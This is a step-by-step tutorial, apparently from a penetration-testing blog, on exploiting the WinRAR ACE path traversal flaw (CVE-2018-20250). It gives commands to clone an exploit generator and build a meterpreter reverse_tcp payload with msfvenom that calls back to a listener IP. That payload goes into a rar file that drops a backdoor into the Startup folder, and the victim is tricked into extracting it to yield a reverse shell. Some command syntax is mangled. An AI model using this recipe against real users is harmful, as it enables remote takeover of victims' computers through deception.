Below we discuss how WinRAR fixed serious security bugs last month. WinRAR is one of the most popular file compression applications in the world, and the vulnerability described below could deceive a user into extracting malicious files.
The vulnerability identified last year by research.checkpoint.com affects all releases released by the company in the last 19 years.
CVE-ID: CVE-2018-20250, CVE-2018-20251, CVE-2018-20252 and CVE-2018-20253
Version: WinRAR 5.70 Beta 1
This vulnerability is due to the UNACEV2.DLL library included in all versions of WinRAR. Winrar uses the ACE format to compress and decompress a folder using UNACE.DLL.
In WinRAR versions prior to 5.61, there is a path traversal vulnerability when developing the ACE filename field (in UNACEV2.dll). When the filename field is handled with specific patterns, the destination (export) folder is ignored, treating the filename as an absolute path. This is due to improper syntax when using unace.dll.
Let's download a python script that will create a malicious file in rar format. Once you have downloaded the Python script, install the dependencies needed to run it.
git clone //github.com/manulqwerty/Evil-WinRAR-Gen.git cd Evil-WinRAR-Gen/ pip3 install -r requirements.txt
Additionally, you should grant full permissions to the python script in the Evil-Winrar-Gen folder and then create a malicious exe file with msfvenom. Name "winrar.exe" as shown in Metasploit.
chmod 777 evilWinRAR.py msfvenom -p windows / meterpreter / reverse_tcp lhost = 192.168.1.110 lport = 1234 -f exe> winrar.exe
Now create a text file that will appear to the victim when exporting the rar file. Then run the evilWinrar python script along with the malicious exe file and the text file, creating a malicious file that you can send to the target.
touch winrar.txt ./evilWinRAR.py -e winrar.exe -g winrar.txt python -m SimpleHTTPServer 8080
As we said, this vulnerability allows us to extract the malicious file from an arbitrary path, and with the help of this script we will allow the export of rar files to the / startup program. Now use social engineering to give the malicious rar to the victim and wait until the victim restarts his machine to get a reverse connection to the target machine.
There is currently no startup program on the victim's machine as shown below. Once the victim extracts the malicious rar file "evil.rar", the backdoor winrar.exe will be extracted from the startup program.
To ensure that the winrar.exe file is in the boot folder, type shell: startup in run prompt.
Once the victim restarts the machine, you will receive a reverse connection as shown below.
Author: Aarti Singh